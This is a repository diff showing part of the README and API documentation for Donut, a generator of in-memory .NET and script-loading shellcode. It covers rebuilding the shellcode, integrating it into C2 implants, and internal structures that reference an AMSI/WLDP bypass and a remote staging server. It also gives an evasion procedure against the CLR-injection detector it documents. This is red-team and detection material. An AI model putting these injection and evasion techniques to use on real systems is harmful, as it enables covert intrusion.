190 ## Using as a Library
191
192 donut is provided as both dynamic and static libraries for both (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
193
194 ## Rebuilding the shellcode
195
196 You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut.
197
198 ### Microsoft Visual Studio
199
200 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
201
202 ```
203 nmake clean -f Makefile.msvc
204 nmake -f Makefile.msvc
205 ```
206
207 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
208
209 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
210
211 ```
212 nmake clean -f Makefile.msvc
213 nmake x86 -f Makefile.msvc
214 ```
215
216 This will save the shellcode as a C array to *payload_exe_x86.h*.
217
218 ### Mingw-w64
219
220 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
221
222 ```
223 make clean -f Makefile.mingw
224 make -f Makefile.mingw
225 ```
226
227 Once you've recompiled for all architectures, you may rebuild donut.
228
229 ## Integrating into Tooling
230
231 We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods:
232
233 * As an operator, using the generator to manually generate shellcode.
234 * Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process.
235 * Use our dynamic or static libraries.
236 * As a template for building your own shellcode / generator.
237 * Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically.
238
239 # Advancing Tradecraft
240
241 It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways:
242
243 * Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret.
244 * Provide blue teams a frame of refernce for detecting and mitigating CLR Injection techniques.
245 * Inspire tool developers to develop new types of techniques and tradecraft.
246
247 ## Alternative Payloads
248
249 The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode.
250
251 ## Injecting .NET At Will / Migration
252
253 Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected.
254
255 ## Disposable AppDomains
256
257 When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. By running the payload in its own AppDomain, this allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role.
258
259 ## Detecting CLR Injection
260
261 One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks.
262
263 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
264
265 While useful, there are both false positives and false negatives:
266
267 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
268 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
269
270 Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment.
271
272 I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly.
273
274 ```
275 void CLR_Injection:
276 WHEN Image_Load event:
277 if event.Module.Name contains "msco*.dll":
278 if !(IsValidAssembly(event.Process.FilePath)):
279 {
280 print "A CLR has been injected into " + event.Process.Id
281 }
282 ```
283
284 The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor.
285
286 ```csharp
287 //CLR Sentry
288 //Author: TheWover
289 while (true)
290 {
291 //Get the module load.
292 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
293
294 //Split the file path into parts delimited by a '\'
295 string[] parts = trace.FileName.Split('\\');
296
297 //Check whether it is a .NET Runtime DLL
298 if (parts[parts.Length - 1].Contains("msco"))
299 {
300 //Get a
301 Process proc = Process.GetProcessById((int) trace.ProcessID);
302
303 //Check if the file is a .NET Assembly
304 if (!IsValidAssembly(proc.StartInfo.FileName))
305 {
306 //If it is not, then the CLR has been injected.
307 Console.WriteLine();
308
309 Console.WriteLine("[!] CLR Injection has been detected!");
310
311 //Display information from the event
312 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
313 }
314 }
315 }
316 ```
317
318 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png)
319
320 It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command.
321
322 ## OpSec Considerations
323
324 ModuleMonitor demonstrates an important point about CLR Injection: When performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build a analytics that monitor for the behavior described in the section above.
325
326 However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure:
327
328 1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into.
329 2. If there are any processes that are already managed, then consider them the set of potential targets.
330 3. If there are not any managed processes, then all processes are potential targets.
331 4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest.
332
333 # Conclusion
334
335 Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools.
+511
-0
docs/api.html less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
